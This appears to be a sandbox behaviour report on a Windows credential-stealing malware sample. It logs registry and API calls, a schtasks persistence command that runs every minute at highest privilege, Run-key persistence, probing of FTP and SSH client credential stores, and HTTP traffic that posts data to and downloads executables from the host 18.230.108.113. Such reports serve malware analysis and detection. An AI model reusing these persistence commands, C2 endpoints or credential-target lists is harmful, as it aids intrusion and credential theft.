 snapshot_handle: 0x000000b0
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: pw.exe
process_identifier: 2004
0 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: pw.exe
process_identifier: 2004
0 0
url http://18.230.108.113/smk/
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Run a KeyLogger rule KeyLogger
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\HashTab
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\HashTab
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.1 (x64 en-US)
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.1 (x64 en-US)
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1}
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1}
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{3160A0D4-A4F3-39B4-B4CC-B5306F9CF9B3}
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{3160A0D4-A4F3-39B4-B4CC-B5306F9CF9B3}
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{50A2BC33-C9CD-3BF1-A8FF-53C10A0B183C}
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{50A2BC33-C9CD-3BF1-A8FF-53C10A0B183C}
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002A-0000-1000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002A-0000-1000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002A-0409-1000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002A-0409-1000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0116-0409-1000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0116-0409-1000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1042
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1042
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{A5F504DF-2ED9-4A2D-A2F3-9D2750DD42D6}
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{A5F504DF-2ED9-4A2D-A2F3-9D2750DD42D6}
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{EF1EC6A9-17DE-3DA9-B040-686A1E8A8B04}
base_handle: 0x80000002
key_handle: 0x000001f0
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{EF1EC6A9-17DE-3DA9-B040-686A1E8A8B04}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020119
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0
cmdline schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "8E9A.tmp" /tr "C:\Users\test22\AppData\Roaming\8E9A.tmp.exe"
cmdline "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "8E9A.tmp" /tr "C:\Users\test22\AppData\Roaming\8E9A.tmp.exe"
buffer Buffer with sha1: c84c11820b2139520fbf85735e969099bcf9f673
buffer Buffer with sha1: 7c0ff8147731363b65ba5e764fcbfc3a482f36a0
buffer Buffer with sha1: 3281369b5b2e4c72c0491d503dafbfb4ccafb43e
buffer Buffer with sha1: 65eef9f578813220f608a3c492706d589fbc1caa
host 121.254.136.107
host 18.230.108.113
registry HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Adobe reg_value C:\Users\test22\AppData\Roaming\Microsoft\egirwvbj\htgaceru.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Adobe reg_value C:\Users\test22\AppData\Roaming\130083.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8E9A.tmp.lnk
cmdline schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "8E9A.tmp" /tr "C:\Users\test22\AppData\Roaming\8E9A.tmp.exe"
cmdline "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "8E9A.tmp" /tr "C:\Users\test22\AppData\Roaming\8E9A.tmp.exe"
file C:\ProgramData\VanDyke\Config\Sessions\
file C:\Users\test22\AppData\Local\VanDyke\Config\Sessions\
file C:\Users\test22\AppData\Roaming\VanDyke\Config\Sessions\
file C:\Users\test22\AppData\Local\SmartFTP\Client 2.0\Favorites\
file C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\
file C:\ProgramData\SmartFTP\Client 2.0\Favorites\
registry HKEY_LOCAL_MACHINE\Software\Ghisler\Windows Commander
registry HKEY_CURRENT_USER\Software\Ghisler\Windows Commander
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_LOCAL_MACHINE\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options
registry HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main
registry HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options
registry HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main
registry HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
registry HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
registry HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\CoffeeCup Software\Internet\Proxy
registry HKEY_LOCAL_MACHINE\Software\FlashFXP\3
registry HKEY_LOCAL_MACHINE\Software\FlashFXP\4
registry HKEY_CURRENT_USER\Software\FlashFXP
registry HKEY_CURRENT_USER\Software\FlashFXP\3
registry HKEY_CURRENT_USER\Software\FlashFXP\4
registry HKEY_LOCAL_MACHINE\Software\FlashFXP
Time & API Arguments Status Return Repeated

WSASend

 buffer: GET / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: www.bing.com
socket: 484
0 0

WSASend

 buffer: GET /fwlink/?LinkId=249109 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: go.microsoft.com
socket: 568
0 0

WSASend

 buffer: xtg—9ãŸag:¢ÝP̀о~žˆ5°ÜóÔk¢Ê‚Œ/5 ÀÀÀ À 283ÿsupport.microsoft.com  
socket: 572
0 0

WSASend

 buffer: 51g—9ã¦áÃi9I Oxï¼ÊW¤$ö×pÿÐ!Õ  ÿ
socket: 572
0 0

WSASend

 buffer: GET /fwlink/?LinkId=249109 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: go.microsoft.com
socket: 568
0 0

WSASend

 buffer: xtg—9çšËÕÓ¾:è‘ÙPï)±®ÏÀm%4¯\ÎåÕ/5 ÀÀÀ À 283ÿsupport.microsoft.com  
socket: 664
0 0

WSASend

 buffer: 51g—9ç™7ªžó¬b ¤³˜¬ä«Z;µŽÌ 1„¡.n—A  ÿ
socket: 664
0 0

WSASend

 buffer: GET /fwlink/?LinkId=133405 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: go.microsoft.com
socket: 568
0 0

WSASend

 buffer: }yg—9ë3 ®Ýiíï8¼[3§ô2­c«9ŸM+‰03ä/5 ÀÀÀ À 288ÿvisualstudio.microsoft.com  
socket: 668
0 0

WSASend

 buffer: 51g—9ëö0桹 7ͦ>æ£ño·ŠRxë끾öÅ  ÿ
socket: 668
0 0

WSASend

 buffer: GET /fwlink/?LinkId=249109 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: go.microsoft.com
socket: 568
0 0

WSASend

 buffer: xtg—9îu²„9Éï"+Á5ð»T¾6T|?‡F>F;/5 ÀÀÀ À 283ÿsupport.microsoft.com  
socket: 672
0 0

WSASend

 buffer: 51g—9îæ…pÕáª!$#Óo¹•B{„Á†Æ¨nãËÀÕg  ÿ
socket: 672
0 0

WSASend

 buffer: POST /smk/ HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Length: 63 Host: 18.230.108.113
socket: 676
0 0

WSASend

 buffer: ùº.&ŽÐ`ùØÓiõ†FKaÍ%(XÅ::í¼3¨|¡ÅQ+Çü_ÃПq;*žg5D½Ý`Ï-û·?вë
socket: 676
0 0

WSASend

 buffer: GET /fwlink/?LinkId=133405 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: go.microsoft.com
socket: 568
0 0

WSASend

 buffer: }yg—9õ´ÀÀYR$Æ#5£Ú;õZ d a¿×™oL2àïˆ/5 ÀÀÀ À 288ÿvisualstudio.microsoft.com  
socket: 672
0 0

WSASend

 buffer: 51g—9õ¯Üð1¢Û»Aå„ô,|$…¥×FU¸^ŒßóLWú  ÿ
socket: 672
0 0

WSASend

 buffer: GET /fwlink/?LinkId=249109 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: go.microsoft.com
socket: 568
0 0

WSASend

 buffer: xtg—9ùEÜy÷¿UºEÃ„ÆQ/úÕï'c8=/5 ÀÀÀ À 283ÿsupport.microsoft.com  
socket: 672
0 0

WSASend

 buffer: 51g—9ù¦vÓmä= ­Ts0cCÆpÑxYË%»“#ˋ#m  ÿ
socket: 672
0 0

WSASend

 buffer: POST /smk/ HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Length: 63 Host: 18.230.108.113
socket: 688
0 0

WSASend

 buffer: ùº.&ŽÐ`ùØÓiõ†FKaÍ%(XÅ::í¼3¨|¡ÅQ+Çü_ÃПq;*žg5D½Þ`Ï-û·?вë
socket: 688
0 0

WSASend

 buffer: GET /vapo.exe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: 18.230.108.113
socket: 688
0 0

WSASend

 buffer: POST /smk/ HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Length: 63 Host: 18.230.108.113
socket: 688
0 0

WSASend

 buffer: ùº.&ŽÐ`ùØÓiõ†FKaÍ%(XÅ::í¼3¨|¡ÅQ+Çü_ÃПq;*žg5D½ß`Ï-û·>вë
socket: 688
0 0

WSASend

 buffer: POST /smk/ HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Length: 63 Host: 18.230.108.113
socket: 688
0 0

WSASend

 buffer: ùº.&ŽÐ`ùØÓiõ†FKaÍ%(XÅ::í¼3¨|¡ÅQ+Çü_ÃПq;*žg5D½Þ`Î-û·?вë
socket: 688
0 0

WSASend

 buffer: GET /files/sel1.exe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: 18.230.108.113
socket: 688
0 0

WSASend

 buffer: POST /smk/ HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Length: 63 Host: 18.230.108.113
socket: 688
0 0

WSASend

 buffer: ùº.&ŽÐ`ùØÓiõ†FKaÍ%(XÅ::í¼3¨|¡ÅQ+Çü_ÃПq;*žg5D½ß`Î-û·>вë
socket: 688
0 0
Time & API Arguments Status Return Repeated

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000001ec
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
